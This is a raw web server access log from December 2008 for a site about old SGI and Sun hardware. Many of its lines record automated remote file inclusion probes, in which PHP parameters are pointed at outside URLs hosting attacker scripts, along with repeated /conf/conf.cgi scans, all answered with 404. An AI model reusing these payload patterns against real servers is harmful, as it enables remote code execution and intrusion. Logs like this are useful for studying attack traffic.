218.38.34.115 - - [14/Dec/2008:04:36:53 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
218.38.34.115 - - [14/Dec/2008:04:36:53 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
218.38.34.115 - - [14/Dec/2008:04:36:53 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
209.172.57.198 - - [14/Dec/2008:04:36:58 -0500] "GET /logs/errors.php?error=http://cccgj.org/media/tmp.txt??? HTTP/1.1" 404 221
209.172.57.198 - - [14/Dec/2008:04:36:59 -0500] "GET /logs/access_log.4/errors.php?error=http://cccgj.org/media/tmp.txt??? HTTP/1.1" 404 234
209.172.57.198 - - [14/Dec/2008:04:36:59 -0500] "GET /errors.php?error=http://cccgj.org/media/tmp.txt??? HTTP/1.1" 404 216
92.236.22.136 - - [14/Dec/2008:04:37:12 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
85.226.216.55 - - [14/Dec/2008:04:37:12 -0500] "GET /sgi_indigo2/i2_front.jpg HTTP/1.1" 200 25559
85.226.216.55 - - [14/Dec/2008:04:37:12 -0500] "GET /sgi_indigo2/i2_front_open.jpg HTTP/1.1" 200 20890
85.226.216.55 - - [14/Dec/2008:04:37:12 -0500] "GET /sgi_indigo2/i2_front_off.jpg HTTP/1.1" 200 23857
200.27.116.182 - - [14/Dec/2008:04:37:12 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 260
85.226.216.55 - - [14/Dec/2008:04:37:13 -0500] "GET /sgi_indigo2/i2_top_off.jpg HTTP/1.1" 200 24288
85.226.216.55 - - [14/Dec/2008:04:37:13 -0500] "GET /sgi_indigo2/i2_isa_gio.jpg HTTP/1.1" 200 18091
85.226.216.55 - - [14/Dec/2008:04:37:13 -0500] "GET /sgi_indigo2/i2_top_rear.jpg HTTP/1.1" 200 27077
85.226.216.55 - - [14/Dec/2008:04:37:13 -0500] "GET /sgi_indigo2/i2_xz_card.jpg HTTP/1.1" 200 22774
85.226.216.55 - - [14/Dec/2008:04:37:13 -0500] "GET /sgi_indigo2/i2_cpu.jpg HTTP/1.1" 200 36143
85.226.216.55 - - [14/Dec/2008:04:37:13 -0500] "GET /sgi_indigo2/i2_cpu.jpg HTTP/1.1" 200 36143
85.226.216.55 - - [14/Dec/2008:04:37:13 -0500] "GET /sgi_indigo2/i2_xz_card.jpg HTTP/1.1" 200 22774
85.226.216.55 - - [14/Dec/2008:04:37:14 -0500] "GET /favicon.ico HTTP/1.1" 200 318
121.162.85.6 - - [14/Dec/2008:04:37:59 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
121.162.85.6 - - [14/Dec/2008:04:37:59 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
121.162.85.6 - - [14/Dec/2008:04:37:59 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
121.162.85.6 - - [14/Dec/2008:04:38:00 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
121.162.85.6 - - [14/Dec/2008:04:38:00 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
121.162.85.6 - - [14/Dec/2008:04:38:00 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
65.55.25.136 - - [14/Dec/2008:04:38:23 -0500] "GET /faq_framebuffer/framebuffer.html HTTP/1.1" 404 238
218.237.66.210 - - [14/Dec/2008:04:39:02 -0500] "GET /logs/access_log.4/errors.php?error=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 234
218.237.66.210 - - [14/Dec/2008:04:39:02 -0500] "GET /errors.php?error=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 216
218.237.66.210 - - [14/Dec/2008:04:39:02 -0500] "GET /logs/errors.php?error=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 221
218.237.66.210 - - [14/Dec/2008:04:39:16 -0500] "GET /logs/error_log.4/errors.php?error=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 233
218.237.66.210 - - [14/Dec/2008:04:39:16 -0500] "GET /errors.php?error=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 216
218.237.66.210 - - [14/Dec/2008:04:39:16 -0500] "GET /logs/errors.php?error=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 221
71.234.37.224 - - [14/Dec/2008:04:40:22 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
71.226.184.32 - - [14/Dec/2008:04:40:27 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
124.125.105.19 - - [14/Dec/2008:04:40:33 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
72.30.79.36 - - [14/Dec/2008:04:40:41 -0500] "GET /sun_ss20/?S=D HTTP/1.0" 200 1916
194.8.75.175 - - [14/Dec/2008:04:40:54 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.175 - - [14/Dec/2008:04:40:54 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.175 - - [14/Dec/2008:04:40:55 -0500] "GET /conf/ HTTP/1.0" 200 47
217.20.112.198 - - [14/Dec/2008:04:41:35 -0500] "POST /conf/conf.cgi HTTP/1.1" 404 219
216.180.251.146 - - [14/Dec/2008:04:41:51 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
216.180.251.146 - - [14/Dec/2008:04:41:51 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
216.180.251.146 - - [14/Dec/2008:04:41:51 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
216.180.251.146 - - [14/Dec/2008:04:41:51 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
216.180.251.146 - - [14/Dec/2008:04:41:52 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
216.180.251.146 - - [14/Dec/2008:04:41:53 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
218.237.66.210 - - [14/Dec/2008:04:42:02 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 255
218.237.66.210 - - [14/Dec/2008:04:42:02 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 260
218.237.66.210 - - [14/Dec/2008:04:42:02 -0500] "GET /logs/access_log.4//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 273
92.48.203.116 - - [14/Dec/2008:04:42:16 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
218.239.45.181 - - [14/Dec/2008:04:42:41 -0500] "GET /logs/error_log.1//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 288
64.18.142.194 - - [14/Dec/2008:04:43:07 -0500] "GET /logs/access_log.2//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 234
194.8.75.103 - - [14/Dec/2008:04:43:34 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.103 - - [14/Dec/2008:04:43:35 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.103 - - [14/Dec/2008:04:43:36 -0500] "GET /conf/ HTTP/1.0" 200 47
218.237.66.210 - - [14/Dec/2008:04:43:51 -0500] "GET /logs/error_log.2//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 272
218.237.66.210 - - [14/Dec/2008:04:43:51 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 255
218.237.66.210 - - [14/Dec/2008:04:43:51 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 260
66.118.142.60 - - [14/Dec/2008:04:43:59 -0500] "GET /logs/access_log.4/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 290
66.118.142.60 - - [14/Dec/2008:04:43:59 -0500] "GET /logs/error_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 287
66.118.142.60 - - [14/Dec/2008:04:43:59 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 272
66.118.142.60 - - [14/Dec/2008:04:43:59 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 277
122.252.234.57 - - [14/Dec/2008:04:44:28 -0500] "GET /sunFAQ/faq_framebuffer/framebuffer.html HTTP/1.1" 200 105424
122.252.234.57 - - [14/Dec/2008:04:44:30 -0500] "GET /sunFAQ/faq_framebuffer/fbfaq_files/FAQ.gif HTTP/1.1" 200 910
122.252.234.57 - - [14/Dec/2008:04:44:31 -0500] "GET /favicon.ico HTTP/1.1" 200 318
85.18.227.229 - - [14/Dec/2008:04:45:08 -0500] "GET /sunFAQ/faq_framebuffer/framebuffer.html HTTP/1.1" 304 -
85.18.227.229 - - [14/Dec/2008:04:45:08 -0500] "GET /sunFAQ/faq_framebuffer/fbfaq_files/FAQ.gif HTTP/1.1" 304 -
67.195.37.153 - - [14/Dec/2008:04:45:12 -0500] "GET /sun_ipx/ HTTP/1.0" 200 11586
82.41.152.88 - - [14/Dec/2008:04:45:57 -0500] "GET /favicon.gif HTTP/1.1" 200 887
80.192.63.43 - - [14/Dec/2008:04:46:28 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
12.240.37.195 - - [14/Dec/2008:04:46:32 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
67.161.233.109 - - [14/Dec/2008:04:46:35 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
66.198.41.20 - - [14/Dec/2008:04:46:57 -0500] "GET /sgi_iris/cpu.jpg HTTP/1.0" 200 59545
208.96.54.70 - - [14/Dec/2008:04:47:00 -0500] "GET /faq/index.html HTTP/1.1" 200 11077
66.118.142.60 - - [14/Dec/2008:04:47:22 -0500] "GET /logs/access_log.4/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 290
66.118.142.60 - - [14/Dec/2008:04:47:22 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 272
66.118.142.60 - - [14/Dec/2008:04:47:22 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 277
66.118.142.60 - - [14/Dec/2008:04:47:22 -0500] "GET /logs/error_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 287
208.96.54.70 - - [14/Dec/2008:04:47:23 -0500] "GET /fc/ HTTP/1.1" 200 7383
208.96.54.70 - - [14/Dec/2008:04:47:44 -0500] "GET /faq/index.html HTTP/1.1" 200 11077
89.149.227.201 - - [14/Dec/2008:04:48:19 -0500] "POST /conf/conf.cgi HTTP/1.0" 404 207
85.18.227.229 - - [14/Dec/2008:04:48:30 -0500] "GET /sunFAQ/faq_framebuffer/framebuffer.html HTTP/1.1" 304 -
85.18.227.229 - - [14/Dec/2008:04:48:30 -0500] "GET /sunFAQ/faq_framebuffer/fbfaq_files/FAQ.gif HTTP/1.1" 304 -
72.30.79.36 - - [14/Dec/2008:04:48:39 -0500] "GET /docs/vim-common-5.4/bugreport.vim HTTP/1.0" 200 1828
66.199.252.114 - - [14/Dec/2008:04:48:44 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
218.38.34.115 - - [14/Dec/2008:04:50:22 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
218.38.34.115 - - [14/Dec/2008:04:50:22 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
218.38.34.115 - - [14/Dec/2008:04:50:22 -0500] "GET /logs/access_log.4//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
218.38.34.115 - - [14/Dec/2008:04:50:25 -0500] "GET /logs/access_log.4//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
218.38.34.115 - - [14/Dec/2008:04:50:25 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
218.38.34.115 - - [14/Dec/2008:04:50:25 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
218.38.34.115 - - [14/Dec/2008:04:50:28 -0500] "GET /logs/access_log.3//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 250
218.38.34.115 - - [14/Dec/2008:04:50:28 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 237
218.38.34.115 - - [14/Dec/2008:04:50:28 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 232
218.38.34.115 - - [14/Dec/2008:04:50:31 -0500] "GET /logs/access_log.3//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 250
218.38.34.115 - - [14/Dec/2008:04:50:32 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 232
218.38.34.115 - - [14/Dec/2008:04:50:32 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 237
80.67.22.215 - - [14/Dec/2008:04:51:23 -0500] "GET /errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 216
218.38.34.115 - - [14/Dec/2008:04:51:39 -0500] "GET /logs/access_log.3//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 253
218.38.34.115 - - [14/Dec/2008:04:51:39 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 240
218.38.34.115 - - [14/Dec/2008:04:51:39 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 235
218.38.34.115 - - [14/Dec/2008:04:51:39 -0500] "GET /logs/access_log.3//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 253
218.38.34.115 - - [14/Dec/2008:04:51:39 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 235
218.38.34.115 - - [14/Dec/2008:04:51:39 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 240
200.27.116.182 - - [14/Dec/2008:04:51:57 -0500] "GET /logs/access_log.4//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 262
200.27.116.182 - - [14/Dec/2008:04:51:58 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
200.27.116.182 - - [14/Dec/2008:04:51:58 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
80.67.22.215 - - [14/Dec/2008:04:52:13 -0500] "GET /errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 216
121.162.85.6 - - [14/Dec/2008:04:52:20 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
121.162.85.6 - - [14/Dec/2008:04:52:21 -0500] "GET /logs/access_log.4//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
121.162.85.6 - - [14/Dec/2008:04:52:21 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
194.8.75.103 - - [14/Dec/2008:04:52:22 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.103 - - [14/Dec/2008:04:52:23 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.103 - - [14/Dec/2008:04:52:24 -0500] "GET /conf/ HTTP/1.0" 200 47
121.162.85.6 - - [14/Dec/2008:04:52:32 -0500] "GET /logs/access_log.4//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
121.162.85.6 - - [14/Dec/2008:04:52:32 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
121.162.85.6 - - [14/Dec/2008:04:52:32 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
121.162.85.6 - - [14/Dec/2008:04:52:35 -0500] "GET /logs/access_log.3//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 250
121.162.85.6 - - [14/Dec/2008:04:52:36 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 232
121.162.85.6 - - [14/Dec/2008:04:52:36 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 237
218.237.66.210 - - [14/Dec/2008:04:52:36 -0500] "GET /logs/error_log.4%20/errors.php?error=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 234
121.162.85.6 - - [14/Dec/2008:04:52:37 -0500] "GET /logs/access_log.3//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 250
121.162.85.6 - - [14/Dec/2008:04:52:38 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 232
121.162.85.6 - - [14/Dec/2008:04:52:38 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 237
89.111.184.172 - - [14/Dec/2008:04:52:50 -0500] "GET /logs/access_log HTTP/1.1" 200 42324
64.18.142.194 - - [14/Dec/2008:04:52:55 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 238
64.18.142.194 - - [14/Dec/2008:04:52:55 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 243
121.162.85.6 - - [14/Dec/2008:04:54:16 -0500] "GET /logs/access_log.3//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 253
121.162.85.6 - - [14/Dec/2008:04:54:17 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 235
121.162.85.6 - - [14/Dec/2008:04:54:17 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 240
77.85.228.119 - - [14/Dec/2008:04:54:20 -0500] "GET /personal/vanagon.html HTTP/1.1" 200 2402
77.85.228.119 - - [14/Dec/2008:04:54:21 -0500] "GET /personal/vw_old_int.jpg HTTP/1.1" 200 59626
121.162.85.6 - - [14/Dec/2008:04:54:41 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 235
121.162.85.6 - - [14/Dec/2008:04:54:41 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 240
121.162.85.6 - - [14/Dec/2008:04:54:41 -0500] "GET /logs/access_log.3//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 253
77.85.228.119 - - [14/Dec/2008:04:54:46 -0500] "GET /personal/vanagon.html HTTP/1.1" 200 2402
200.27.116.182 - - [14/Dec/2008:04:55:08 -0500] "GET /logs/error_log.4//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 261
200.27.116.182 - - [14/Dec/2008:04:55:12 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
200.27.116.182 - - [14/Dec/2008:04:55:15 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
89.111.184.172 - - [14/Dec/2008:04:55:26 -0500] "GET /logs/access_log.4 HTTP/1.1" 200 148669
202.182.48.26 - - [14/Dec/2008:04:56:42 -0500] "GET /logs/error_log.3/errors.php?error=http://www.geocities.com/killer_them/idv6.txt????? HTTP/1.0" 404 221
202.182.48.26 - - [14/Dec/2008:04:56:43 -0500] "GET /errors.php?error=http://www.geocities.com/killer_them/idv6.txt????? HTTP/1.0" 404 204
202.182.48.26 - - [14/Dec/2008:04:56:44 -0500] "GET /logs/errors.php?error=http://www.geocities.com/killer_them/idv6.txt????? HTTP/1.0" 404 209
194.8.75.175 - - [14/Dec/2008:04:56:50 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.175 - - [14/Dec/2008:04:56:50 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.175 - - [14/Dec/2008:04:56:56 -0500] "GET /conf/ HTTP/1.0" 200 47
82.5.70.183 - - [14/Dec/2008:04:57:08 -0500] "GET /sgi_indigo2/ HTTP/1.1" 200 12751
82.5.70.183 - - [14/Dec/2008:04:57:09 -0500] "GET /sgi_indigo2/i2_front.jpg HTTP/1.1" 200 25559
82.5.70.183 - - [14/Dec/2008:04:57:09 -0500] "GET /sgi_indigo2/i2_front_open.jpg HTTP/1.1" 200 20890
82.5.70.183 - - [14/Dec/2008:04:57:09 -0500] "GET /sgi_indigo2/i2_front_off.jpg HTTP/1.1" 200 23857
82.5.70.183 - - [14/Dec/2008:04:57:10 -0500] "GET /sgi_indigo2/i2_top_off.jpg HTTP/1.1" 200 24288
82.5.70.183 - - [14/Dec/2008:04:57:10 -0500] "GET /sgi_indigo2/i2_isa_gio.jpg HTTP/1.1" 200 18091
82.5.70.183 - - [14/Dec/2008:04:57:10 -0500] "GET /sgi_indigo2/i2_top_rear.jpg HTTP/1.1" 200 27077
82.5.70.183 - - [14/Dec/2008:04:57:10 -0500] "GET /sgi_indigo2/i2_cpu.jpg HTTP/1.1" 200 36143
82.5.70.183 - - [14/Dec/2008:04:57:10 -0500] "GET /sgi_indigo2/i2_xz_card.jpg HTTP/1.1" 200 22774
218.237.66.210 - - [14/Dec/2008:04:57:13 -0500] "GET /logs//include.php?path[docroot]=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 223
218.237.66.210 - - [14/Dec/2008:04:57:13 -0500] "GET //include.php?path[docroot]=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 218
218.237.66.210 - - [14/Dec/2008:04:57:13 -0500] "GET /logs/error_log//include.php?path[docroot]=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 233
194.165.42.59 - - [14/Dec/2008:04:57:24 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
92.48.203.116 - - [14/Dec/2008:04:57:34 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
202.182.48.26 - - [14/Dec/2008:04:57:41 -0500] "GET /logs/access_log.4/errors.php?error=http://www.geocities.com/killer_them/idv6.txt????? HTTP/1.0" 404 222
216.180.251.146 - - [14/Dec/2008:04:57:41 -0500] "GET /logs/access_log.4//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
216.180.251.146 - - [14/Dec/2008:04:57:41 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
216.180.251.146 - - [14/Dec/2008:04:57:43 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
216.180.251.146 - - [14/Dec/2008:04:57:45 -0500] "GET /logs/access_log.4//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
216.180.251.146 - - [14/Dec/2008:04:57:45 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
216.180.251.146 - - [14/Dec/2008:04:57:45 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
66.40.52.28 - - [14/Dec/2008:04:58:48 -0500] "GET /logs/access_log/main.php?GLOBALS[PT_Config][dir][data]=http://www.geocities.com/brojollele/fx29id.txt?? HTTP/1.1" 404 230
66.40.52.28 - - [14/Dec/2008:04:58:48 -0500] "GET /main.php?GLOBALS[PT_Config][dir][data]=http://www.geocities.com/brojollele/fx29id.txt?? HTTP/1.1" 404 214
66.40.52.28 - - [14/Dec/2008:04:58:48 -0500] "GET /logs/main.php?GLOBALS[PT_Config][dir][data]=http://www.geocities.com/brojollele/fx29id.txt?? HTTP/1.1" 404 219
66.40.52.28 - - [14/Dec/2008:04:58:48 -0500] "GET /logs/main.php?GLOBALS[PT_Config][dir][data]=http://www.geocities.com/brojollele/fx29id.txt?? HTTP/1.1" 404 219
66.40.52.28 - - [14/Dec/2008:04:58:49 -0500] "GET /main.php?GLOBALS[PT_Config][dir][data]=http://www.geocities.com/brojollele/fx29id.txt?? HTTP/1.1" 404 214
72.30.79.36 - - [14/Dec/2008:04:59:06 -0500] "GET /docs/zip-2.2/?D=D HTTP/1.0" 200 1293
218.237.66.210 - - [14/Dec/2008:04:59:30 -0500] "GET /logs/error_log.4//include.php?path[docroot]=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 235
89.249.18.13 - - [14/Dec/2008:05:00:07 -0500] "GET /errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 216
200.27.116.182 - - [14/Dec/2008:05:01:03 -0500] "GET /logs/error_log.4//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 261
200.27.116.182 - - [14/Dec/2008:05:01:03 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
200.27.116.182 - - [14/Dec/2008:05:01:03 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
